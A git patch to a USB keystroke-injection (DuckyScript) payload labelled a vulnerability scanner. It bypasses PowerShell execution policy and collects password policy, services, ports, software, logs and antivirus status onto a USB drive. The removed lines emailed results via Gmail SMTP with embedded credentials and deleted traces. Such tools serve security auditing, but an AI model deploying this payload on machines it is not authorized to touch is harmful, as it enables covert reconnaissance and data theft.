From a92fd2b38a340a33019ee7bbcd7e2078f40f1fd3 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Mon, 20 May 2024 17:09:53 -0400 Subject: [PATCH] Update 3.0. VulnerabilityScanner --- 3.0. VulnerabilityScanner | 714 ++++++++++++++++++++++++++------------ 1 file changed, 495 insertions(+), 219 deletions(-) diff --git a/3.0. VulnerabilityScanner b/3.0. VulnerabilityScanner index 8f2ab62..6868e64 100644 --- a/3.0. VulnerabilityScanner +++ b/3.0. VulnerabilityScanner @@ -1,4 +1,4 @@ -REM script in progress + DELAY 1000 REM Open Start Menu CONTROL ESCAPE @@ -17,328 +17,604 @@ DELAY 5000 REM Set PowerShell Execution Policy to Bypass DELAY 1000 STRING set-executionpolicy bypass -scope process -force -DELAY 100 +DELAY 400 ENTER DELAY 400 REM Create the PowerShell script in memory and execute it -DELAY 100 -STRING $securepassword = convertto-securestring 'YourAppSpecificPassword' -asplaintext -force -DELAY 100 +DELAY 400 +STRING $usbName = "MYUSB" +DELAY 400 ENTER DELAY 400 -STRING $credential = new-object system.management.automation.pscredential ('igrowsc@gmail.com', $securepassword) -DELAY 100 +STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter +DELAY 400 ENTER DELAY 400 -STRING $script = { -DELAY 100 +STRING if ($usbDrive) { +DELAY 400 +ENTER +DELAY 400 +STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName +DELAY 400 +ENTER +DELAY 400 +STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner +DELAY 400 +ENTER +DELAY 400 +STRING New-Item -ItemType Directory -Path $directoryPath +DELAY 400 +ENTER +DELAY 400 +STRING $resultsFilePath = Join-Path -Path $directoryPath -ChildPath "results.txt" +DELAY 400 +ENTER +DELAY 400 +STRING "" > $resultsFilePath +DELAY 400 ENTER DELAY 400 STRING function check-passwordpolicy { -DELAY 100 +DELAY 400 ENTER DELAY 400 -STRING net accounts -DELAY 100 +STRING try { +DELAY 400 ENTER DELAY 400 -STRING } -DELAY 100 +STRING net accounts +DELAY 400 ENTER DELAY 400 -STRING function audit-services { -DELAY 100 +STRING } catch { +DELAY 400 ENTER DELAY 400 -STRING get-service | select-object name, displayname, status, starttype -DELAY 100 -ENTER +STRING write-output "Error checking password policy: $_" DELAY 400 -STRING } -DELAY 100 -ENTER -DELAY 400 -STRING function check-networksettings { -DELAY 100 -ENTER -DELAY 400 -STRING get-netipconfiguration -DELAY 100 -ENTER -DELAY 400 -STRING } -DELAY 100 -ENTER -DELAY 400 -STRING function check-softwarevulnerabilities { -DELAY 100 -ENTER -DELAY 400 -STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher -DELAY 100 -ENTER -DELAY 400 -STRING } -DELAY 100 -ENTER -DELAY 400 -STRING function check-cve { -DELAY 100 -ENTER -DELAY 400 -STRING param ( -DELAY 100 -ENTER -DELAY 400 -STRING [string]$productname, -DELAY 100 -ENTER -DELAY 400 -STRING [string]$version -DELAY 100 -ENTER -DELAY 400 -STRING ) -DELAY 100 -ENTER -DELAY 400 -STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version" -DELAY 100 -ENTER -DELAY 400 -STRING start-sleep -seconds 5 -DELAY 100 -ENTER -DELAY 400 -STRING $response = invoke-restmethod -uri $uri -method get -DELAY 100 -ENTER -DELAY 400 -STRING if ($response.totalresults -gt 0) { -DELAY 100 -ENTER -DELAY 400 -STRING foreach ($cve in $response.result.cve_items) { -DELAY 100 -ENTER -DELAY 400 -STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)" -DELAY 100 -ENTER -DELAY 400 -STRING } -DELAY 100 -ENTER -DELAY 400 -STRING } else { -DELAY 100 -ENTER -DELAY 400 -STRING "no cves found for $productname $version" -DELAY 100 ENTER DELAY 400 STRING } -DELAY 100 +DELAY 400 ENTER DELAY 400 STRING } -DELAY 100 +DELAY 400 ENTER DELAY 400 -STRING function analyze-logs { -DELAY 100 +STRING function audit-services { +DELAY 400 ENTER DELAY 400 -STRING get-eventlog -logname system -newest 100 -DELAY 100 +STRING try { +DELAY 400 +ENTER +DELAY 400 +STRING get-service | select-object name, displayname, status, starttype +DELAY 400 +ENTER +DELAY 400 +STRING } catch { +DELAY 400 +ENTER +DELAY 400 +STRING write-output "Error auditing services: $_" +DELAY 400 +ENTER +DELAY 400 +STRING } +DELAY 400 ENTER DELAY 400 STRING } -DELAY 100 +DELAY 400 ENTER DELAY 400 -STRING function check-openports { -DELAY 100 +STRING function check-networksettings { +DELAY 400 ENTER DELAY 400 -STRING netstat -an -DELAY 100 +STRING try { +DELAY 400 +ENTER +DELAY 400 +STRING get-netipconfiguration +DELAY 400 +ENTER +DELAY 400 +STRING } catch { +DELAY 400 +ENTER +DELAY 400 +STRING write-output "Error checking network settings: $_" +DELAY 400 +ENTER +DELAY 400 +STRING } +DELAY 400 ENTER DELAY 400 STRING } -DELAY 100 +DELAY 400 ENTER DELAY 400 -STRING function check-missingupdates { -DELAY 100 +STRING function check-softwarevulnerabilities { +DELAY 400 ENTER DELAY 400 -STRING get-windowsupdatelog -DELAY 100 +STRING try { +DELAY 400 +ENTER +DELAY 400 +STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher +DELAY 400 +ENTER +DELAY 400 +STRING } catch { +DELAY 400 +ENTER +DELAY 400 +STRING write-output "Error checking software vulnerabilities: $_" +DELAY 400 +ENTER +DELAY 400 +STRING } +DELAY 400 ENTER DELAY 400 STRING } -DELAY 100 +DELAY 400 ENTER DELAY 400 -STRING function check-firewallstatus { -DELAY 100 -ENTER +STRING function check-cve { DELAY 400 -STRING netsh advfirewall show allprofiles -DELAY 100 -ENTER -DELAY 400 -STRING } -DELAY 100 -ENTER -DELAY 400 -STRING function check-smbv1status { -DELAY 100 -ENTER -DELAY 400 -STRING get-windowsoptionalfeature -online -featurename smb1protocol -DELAY 100 -ENTER -DELAY 400 -STRING } -DELAY 100 -ENTER -DELAY 400 -STRING function check-antivirusstatus { -DELAY 100 -ENTER -DELAY 400 -STRING get-mpcomputerstatus -DELAY 100 -ENTER -DELAY 400 -STRING } -DELAY 100 -ENTER -DELAY 400 -STRING function send-emailandcleanup { -DELAY 100 ENTER DELAY 400 STRING param ( -DELAY 100 +DELAY 400 ENTER DELAY 400 -STRING [string]$smtpserver, -DELAY 100 +STRING [string]$productname, +DELAY 400 ENTER DELAY 400 -STRING [string]$smtpfrom, -DELAY 100 -ENTER +STRING [string]$version DELAY 400 -STRING [string]$smtpto, -DELAY 100 -ENTER -DELAY 400 -STRING [string]$messagesubject, -DELAY 100 -ENTER -DELAY 400 -STRING [string]$messagebody, -DELAY 100 -ENTER -DELAY 400 -STRING [string]$attachmentpath, -DELAY 100 -ENTER -DELAY 400 -STRING [system.management.automation.pscredential]$credential -DELAY 100 ENTER DELAY 400 STRING ) -DELAY 100 +DELAY 400 ENTER DELAY 400 -STRING $smtp = new-object net.mail.smtpclient($smtpserver) -DELAY 100 +STRING $initialDelay = 2 +DELAY 400 ENTER DELAY 400 -STRING $smtp.credentials = $credential -DELAY 100 +STRING try { +DELAY 400 ENTER DELAY 400 -STRING $smtp.enablessl = $true -DELAY 100 +STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version" +DELAY 400 ENTER DELAY 400 -STRING $smtp.send($smtpfrom, $smtpto, $messagesubject, $messagebody + (get-content -path $attachmentpath -raw)) -DELAY 100 +STRING start-sleep -seconds $initialDelay +DELAY 400 ENTER DELAY 400 -STRING remove-item -path $attachmentpath -DELAY 100 +STRING $response = invoke-restmethod -uri $uri -method get +DELAY 400 +ENTER +DELAY 400 +STRING if ($response.totalresults -gt 0) { +DELAY 400 +ENTER +DELAY 400 +STRING foreach ($cve in $response.result.cve_items) { +DELAY 400 +ENTER +DELAY 400 +STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)" +DELAY 400 +ENTER +DELAY 400 +STRING } +DELAY 400 +ENTER +DELAY 400 +STRING } else { +DELAY 400 +ENTER +DELAY 400 +STRING "no cves found for $productname $version" +DELAY 400 +ENTER +DELAY 400 +STRING } +DELAY 400 +ENTER +DELAY 400 +STRING } catch { +DELAY 400 +ENTER +DELAY 400 +STRING write-output "Error checking CVEs: $_" +DELAY 400 +ENTER +DELAY 400 +STRING if ($_.Exception -match '403') { +DELAY 400 +ENTER +DELAY 400 +STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..." +DELAY 400 +ENTER +DELAY 400 +STRING start-sleep -seconds 60 +DELAY 400 +ENTER +DELAY 400 +STRING $retryResponse = invoke-restmethod -uri $uri -method get +DELAY 400 +ENTER +DELAY 400 +STRING if ($retryResponse.totalresults -gt 0) { +DELAY 400 +ENTER +DELAY 400 +STRING foreach ($cve in $retryResponse.result.cve_items) { +DELAY 400 +ENTER +DELAY 400 +STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)" +DELAY 400 +ENTER +DELAY 400 +STRING } +DELAY 400 +ENTER +DELAY 400 +STRING } else { +DELAY 400 +ENTER +DELAY 400 +STRING "no cves found for $productname $version" +DELAY 400 +ENTER +DELAY 400 +STRING } +DELAY 400 +ENTER +DELAY 400 +STRING } +DELAY 400 +ENTER +DELAY 400 +STRING } +DELAY 400 ENTER DELAY 400 STRING } -DELAY 100 +DELAY 400 ENTER DELAY 400 -STRING check-passwordpolicy > results.txt -DELAY 100 +STRING function analyze-logs { +DELAY 400 ENTER DELAY 400 -STRING audit-services >> results.txt -DELAY 100 +STRING try { +DELAY 400 ENTER DELAY 400 -STRING check-networksettings >> results.txt -DELAY 100 +STRING get-eventlog -logname system -newest 100 +DELAY 400 ENTER DELAY 400 -STRING check-softwarevulnerabilities >> results.txt -DELAY 100 +STRING } catch { +DELAY 400 ENTER DELAY 400 -STRING analyze-logs >> results.txt -DELAY 100 +STRING write-output "Error analyzing logs: $_" +DELAY 400 ENTER DELAY 400 -STRING check-openports >> results.txt -DELAY 100 +STRING } +DELAY 400 ENTER DELAY 400 -STRING check-missingupdates >> results.txt -DELAY 100 +STRING } +DELAY 400 ENTER DELAY 400 -STRING check-firewallstatus >> results.txt -DELAY 100 +STRING function check-openports { +DELAY 400 ENTER DELAY 400 -STRING check-smbv1status >> results.txt -DELAY 100 +STRING try { +DELAY 400 ENTER DELAY 400 -STRING check-antivirusstatus >> results.txt -DELAY 100 +STRING netstat -an +DELAY 400 ENTER DELAY 400 -STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | foreach-object { check-cve -productname $_.displayname -version $_.displayversion } >> results.txt -DELAY 100 +STRING } catch { +DELAY 400 ENTER DELAY 400 -STRING send-emailandcleanup -smtpserver "smtp.gmail.com" -smtpfrom "igrowsc@gmail.com" -smtpto "igrowsc@gmail.com" -messagesubject "vulnerability scan results" -messagebody "attached are the results of the vulnerability scan." -attachmentpath "results.txt" -credential $credential -DELAY 100 +STRING write-output "Error checking open ports: $_" +DELAY 400 ENTER DELAY 400 -STRING remove-item -path $myinvocation.mycommand.path -DELAY 100 +STRING } +DELAY 400 +ENTER +DELAY 400 +STRING } +DELAY 400 +ENTER +DELAY 400 +STRING function check-missingupdates { +DELAY 400 +ENTER +DELAY 400 +STRING try { +DELAY 400 +ENTER +DELAY 400 +STRING write-output "Checking Windows Update logs..." +DELAY 400 +ENTER +DELAY 400 +STRING $updateLogPath = Join-Path -Path $directoryPath -ChildPath "WindowsUpdate.log" +DELAY 400 +ENTER +DELAY 400 +STRING Get-WindowsUpdateLog -LogPath $updateLogPath +DELAY 400 +ENTER +DELAY 400 +STRING write-output "WindowsUpdate.log written to $updateLogPath" +DELAY 400 +ENTER +DELAY 400 +STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force +DELAY 400 +ENTER +DELAY 400 +STRING } catch { +DELAY 400 +ENTER +DELAY 400 +STRING write-output "Error getting Windows Update log: $_" +DELAY 400 +ENTER +DELAY 400 +STRING } +DELAY 400 +ENTER +DELAY 400 +STRING } +DELAY 400 +ENTER +DELAY 400 +STRING function check-firewallstatus { +DELAY 400 +ENTER +DELAY 400 +STRING try { +DELAY 400 +ENTER +DELAY 400 +STRING netsh advfirewall show allprofiles +DELAY 400 +ENTER +DELAY 400 +STRING } catch { +DELAY 400 +ENTER +DELAY 400 +STRING write-output "Error checking firewall status: $_" +DELAY 400 +ENTER +DELAY 400 +STRING } +DELAY 400 +ENTER +DELAY 400 +STRING } +DELAY 400 +ENTER +DELAY 400 +STRING function check-smbv1status { +DELAY 400 +ENTER +DELAY 400 +STRING try { +DELAY 400 +ENTER +DELAY 400 +STRING get-windowsoptionalfeature -online -featurename smb1protocol +DELAY 400 +ENTER +DELAY 400 +STRING } catch { +DELAY 400 +ENTER +DELAY 400 +STRING write-output "Error checking SMBv1 status: $_" +DELAY 400 +ENTER +DELAY 400 +STRING } +DELAY 400 +ENTER +DELAY 400 +STRING } +DELAY 400 +ENTER +DELAY 400 +STRING function check-antivirusstatus { +DELAY 400 +ENTER +DELAY 400 +STRING try { +DELAY 400 +ENTER +DELAY 400 +STRING get-mpcomputerstatus +DELAY 400 +ENTER +DELAY 400 +STRING } catch { +DELAY 400 +ENTER +DELAY 400 +STRING write-output "Error checking antivirus status: $_" +DELAY 400 +ENTER +DELAY 400 +STRING } +DELAY 400 +ENTER +DELAY 400 +STRING } +DELAY 400 +ENTER +DELAY 400 +STRING check-passwordpolicy >> $resultsFilePath +DELAY 400 +ENTER +DELAY 400 +STRING audit-services >> $resultsFilePath +DELAY 400 +ENTER +DELAY 400 +STRING check-networksettings >> $resultsFilePath +DELAY 400 +ENTER +DELAY 400 +STRING check-softwarevulnerabilities >> $resultsFilePath +DELAY 400 +ENTER +DELAY 400 +STRING analyze-logs >> $resultsFilePath +DELAY 400 +ENTER +DELAY 400 +STRING check-openports >> $resultsFilePath +DELAY 400 +ENTER +DELAY 400 +STRING check-missingupdates >> $resultsFilePath +DELAY 400 +ENTER +DELAY 400 +STRING check-firewallstatus >> $resultsFilePath +DELAY 400 +ENTER +DELAY 400 +STRING check-smbv1status >> $resultsFilePath +DELAY 400 +ENTER +DELAY 400 +STRING check-antivirusstatus >> $resultsFilePath +DELAY 400 +ENTER +DELAY 400 +REM Dynamically identify critical software from running processes and scheduled tasks +STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique +DELAY 400 +ENTER +DELAY 400 +STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique +DELAY 400 +ENTER +DELAY 400 +REM Combine running software and scheduled tasks +STRING $softwareList = @() +DELAY 400 +ENTER +DELAY 400 +STRING foreach ($process in $runningSoftware) { +DELAY 400 +ENTER +DELAY 400 +STRING $softwareList += $process.Name +DELAY 400 +ENTER +DELAY 400 +STRING } +DELAY 400 +ENTER +DELAY 400 +STRING foreach ($task in $scheduledTasks) { +DELAY 400 +ENTER +DELAY 400 +STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun) +DELAY 400 +ENTER +DELAY 400 +STRING } +DELAY 400 +ENTER +DELAY 400 +REM Remove duplicates and empty entries +STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" } +DELAY 400 +ENTER +DELAY 400 +REM Check CVEs for identified software +STRING foreach ($software in $softwareList) { +DELAY 400 +ENTER +DELAY 400 +STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion +DELAY 400 +ENTER +DELAY 400 +STRING if ($version) { +DELAY 400 +ENTER +DELAY 400 +STRING check-cve -productname $software -version $version >> $resultsFilePath +DELAY 400 +ENTER +DELAY 400 +STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10) +DELAY 400 +ENTER +DELAY 400 +STRING start-sleep -seconds $initialDelay +DELAY 400 +ENTER +DELAY 400 +STRING } +DELAY 400 +ENTER +DELAY 400 +STRING } +DELAY 400 +ENTER +DELAY 400 +STRING write-output "Results saved to USB drive." +DELAY 400 +ENTER +DELAY 400 +STRING } else { +DELAY 400 +ENTER +DELAY 400 +STRING write-output "Error: USB drive MYUSB not found." +DELAY 400 ENTER DELAY 400 STRING } -DELAY 100 +DELAY 400 ENTER DELAY 400 STRING invoke-command -scriptblock $script -DELAY 100 +DELAY 400 ENTER DELAY 20000